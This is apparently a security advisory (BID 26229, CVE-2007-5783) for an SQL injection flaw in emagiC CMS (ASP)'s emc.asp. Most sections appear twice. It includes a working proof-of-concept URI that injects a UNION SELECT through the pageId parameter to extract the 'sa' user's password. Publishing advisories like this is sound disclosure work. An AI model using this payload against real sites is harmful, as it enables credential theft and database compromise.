emagiC CMS (ASP) EMC.ASP SQL Injection Vulnerability
BID:26229
Info
emagiC CMS (ASP) EMC.ASP SQL Injection Vulnerability
| Bugtraq ID: | 26229 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5783 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 29 2007 12:00AM |
| Updated: | Nov 15 2007 12:38AM |
| Credit: | hak3r-b0y is credited with the discovery of this vulnerability. |
| Vulnerable: |
emagiC CMS (ASP) |
| Not Vulnerable: | |
Discussion
emagiC CMS (ASP) EMC.ASP SQL Injection Vulnerability
emagiC CMS (ASP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
emagiC CMS (ASP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
emagiC CMS (ASP) EMC.ASP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username='sa'--
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username='sa'--
Solution / Fix
emagiC CMS (ASP) EMC.ASP SQL Injection Vulnerability
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply this update.
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply this update.